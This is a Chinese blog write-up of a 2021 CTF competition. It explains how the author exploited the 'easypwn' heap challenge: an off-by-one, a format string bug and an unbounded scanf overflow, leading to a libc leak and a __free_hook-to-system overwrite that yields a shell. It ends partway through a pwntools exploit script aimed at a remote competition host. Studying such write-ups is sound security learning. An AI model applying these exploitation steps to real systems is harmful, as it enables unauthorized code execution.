2021年津门杯ctf线上赛记录（WICCTF）

概述

  本篇博客记录下自己的第一次ctf比赛经历，其实不完全是第一次，之前也参加过其他比赛，但只能做个签到就走了，这次不一样了，好歹做出了一道pwn题，有一道本来是有机会的，搞错libc了，线上没拿到flag，不过线上复现了下，感觉还行。因此特写下此篇博文，记录自己的一血。😏

pwn题

  我个人现在只会做做pwn题，后面打算也看看web，提升一下综合实力，这里介绍下比赛中的两道pwn题，和官方wp不一样，这里是我自己的思路。

easypwn

  easypwn
  这道题目是最开始放出来的，确实是最简单的一道pwn题。该题目是典型的堆题，有增删查改四个功能，主要存在两个典型的漏洞。第一个是off by one，如下面第一张图所示，在add功能函数中，可读取的字节数比申请的size大一个字节；然后是show功能函数中，存在典型的格式化字符串漏洞。该题目got表可写，其余保护全开，因此官方的wp是利用格式化字符串泄露出code基地址，然后利用off by one实现unlink， 最后控制bss上的堆指针，从而可以泄露libc以及进一步修改got表获取shell。


  值得一提的是，当时我在做题时，并没有发现上面两个漏洞，之所以犯了这样的错误，是因为有一个更大更明显的漏洞吸引了我，如下图所示，在add功能和edit功能中都有下面两个scanf函数，这里使用%s读取，没有限制长度，且存储的位置刚好在bss段堆指针的上面，所以这里就有天然控制堆指针的方法。

  因此我的思路是直接构造unsorted bin，利用scanf函数的漏洞可以覆盖标记位使得show函数正常工作从而泄露出libc地址。当时比赛时，没有给libc，因此也就不知道是否存在tcache，这里可以直接先假设其没有，然后在比赛时经过验证确实是不存在tcache机制。通过泄露出的libc，我在网上查到其是libc-2.23.so版本的，然后用同样的方法利用scanf漏洞去控制堆指针，直接改堆指针为free_hook，进一步修改为system，然后free即可拿到shell。下面是完整的exp，用我的这种方法感觉会快很多。

from pwn import *p = remote("119.3.81.43", 49153)def new(number, name, size, con):p.recvuntil("your choice>>")p.send("1")p.recvuntil("phone number:")p.sendline(number)p.recvuntil("name:")p.sendline(name)p.recvuntil("input des size:")p.sendline(str(size))p.recvuntil("des info:")p.sendline(con)def free(idx):p.recvuntil("your choice>>")p.send("2")p.recvuntil("input index:")p.sendline(str(idx))def show(idx):p.recvuntil("your choice>>")p.send("3")p.recvuntil("input index:")p.sendline(str(idx))def edit(idx, number, name